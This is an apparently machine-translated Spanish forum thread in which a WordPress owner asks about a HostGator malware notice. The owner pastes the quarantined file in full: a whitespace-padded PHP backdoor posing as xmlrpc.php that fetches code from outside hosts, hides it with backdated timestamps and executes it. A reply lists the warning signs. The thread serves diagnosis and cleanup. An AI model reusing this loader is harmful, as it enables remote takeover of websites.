Hosting enviar errores de virus no pudo deshacerse de esto

Navega tus respuestas
2

Tengo un sitio web de wordpress y hostgator sigue enviando esta información →

  

Durante un análisis de nuestros servidores, identificamos contenido malicioso en   Cuentas bajo su control. Hemos puesto en cuarentena los archivos listados.   abajo para evitar abusos. Tenga en cuenta que ningún servicio ha sido   Deshabilitado y ningún contenido legítimo ha sido afectado por esta acción.   Sin embargo, es posible que otra actividad maliciosa pueda tener   interrumpió sus servicios.

     

Las cosas más importantes que puede hacer para garantizar la seguridad de su   la cuenta es para asegurarse de que su software (por ejemplo, WordPress) esté actualizado,   y que tus contraseñas sean fuertes. Le recomendamos encarecidamente que   cambie todas las contraseñas de su cuenta y actualice todo el software tan pronto como sea posible   como sea posible para evitar más compromisos o abusos.

     

Entendemos que cualquier riesgo para la reputación de nuestra red es un riesgo para nuestra   La reputación de los clientes y así tomamos informes de terceros de la red.   abusar en serio Con el fin de proteger nuestra reputación compartida podemos   deshabilitar los servicios de la cuenta en caso de un informe de terceros   abuso de la red hasta que estemos seguros de que la cuenta ha sido   Limpiado y asegurado adecuadamente.

     

Este correo electrónico es para informarle del contenido encontrado por nuestros análisis proactivos,   y no es el resultado de un informe de abuso de terceros. No hay servicios tienen   ha sido desactivado como resultado de este descubrimiento. Información adicional sobre   Las políticas de HostGator y qué actividad es perjudicial para una red   Reputación en general, está disponible en nuestra base de conocimientos: Aceptable.   Política de uso

     

Mi cuenta fue hackeada

     

Si desea ayuda para proteger su cuenta, le recomendamos SiteLock,   Un servicio de seguridad y socio nuestro. Se les puede contactar en   844-631-8637. Archivos de cuarentena del Departamento de Seguridad de HostGator:   /home2/xxxxx/public_html/xm1rpc.php

     

He adjuntado el archivo: 

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: ''; 
if (false !== strpos($query, 'simpler-ws')) { 
  __1get_ws(); 
  $ws_hash = md5('wsa'); 
  $cache_dir = __1get_root(); 
  $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; 
  require($ws_file); die(''); 
} 

function __1get_root() { 
  $localpath=getenv("SCRIPT_NAME");
  $absolutepath=getenv("SCRIPT_FILENAME");
  $root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
  return $root_path; 
} 

function __1get_ws() { 
  $host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: ''; 
  $ws_hash = md5('wsa'); 
  $cache_dir = __1get_root(); 
  $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; 
  if (file_exists($ws_file)) { 
    chmod($ws_file, 0644); 
  } 
  if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*1)) { 
  $ws = __1fetch_url(__get_rev().'&get_ws'); 
  if (!empty($ws)) 
    file_put_contents($ws_file, $ws); 
    chmod($ws_file, 0644); 
    touch($ws_file, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
    touch(dirname($ws_file) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
  } else { 
    $ws = file_get_contents($ws_file); 
  } 
  return $ws; 
} 

function __get_rev() { 
  return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); 
  return 'http://nezlobudnya.com/generate'; 
} 

function __1fetch_url($url) { 
  $contents = false; 
  $errs = 0; 
  while ( !$contents && ($errs++ < 3) ) { 
    $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'; 
      if (is_callable('curl_init')) { 
        $c = curl_init($url); 
        curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE); 
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($c, CURLOPT_USERAGENT,$user_agent); 
        $contents = curl_exec($c); 
          if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) 
              $contents = false; 
              curl_close($c); 
          } else { 
              $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen')); 
                 if ($allowUrlFopen) { 
                    $options = array('http' => array('user_agent' => $user_agent)); $context = stream_context_create($options); $contents = @file_get_contents($url, false, $context); 
                 } 
          } 
      } 
   return $contents; 
}
// Silence is golden

He ejecutado una exploración de succuri, pero no pudo encontrar ningún virus. ¿Cuál es el problema?

    
pregunta The WP Novice 08.02.2017 - 04:17
fuente

1 respuesta

1

Puntos de sospecha con ese archivo:

  • mucho espacio desperdiciado antes del código.

  • iniciándolo como un archivo de wordpress legítimo pero introduciendo un código que no se encuentra en ese archivo normalmente.

  • modificando ligeramente el nombre del archivo reemplazando l por 1

  • cambiando los derechos sobre otros archivos mediante programación.

  • redirigiendo la página a un par de otros sitios.

  • no está limpiando las cadenas de entrada.

Probablemente debería revisar su servidor y su código a fondo y luego limpiar el servidor y volver a instalar su sitio de WordPress.

    
respondido por el Math Man 08.02.2017 - 05:01
fuente

Lea otras preguntas en las etiquetas

Cifrado de contraseñas con una clave del lado del cliente y el servidor ¿Es posible prevenir / limitar el almacenamiento en caché de los registros de DNSSec?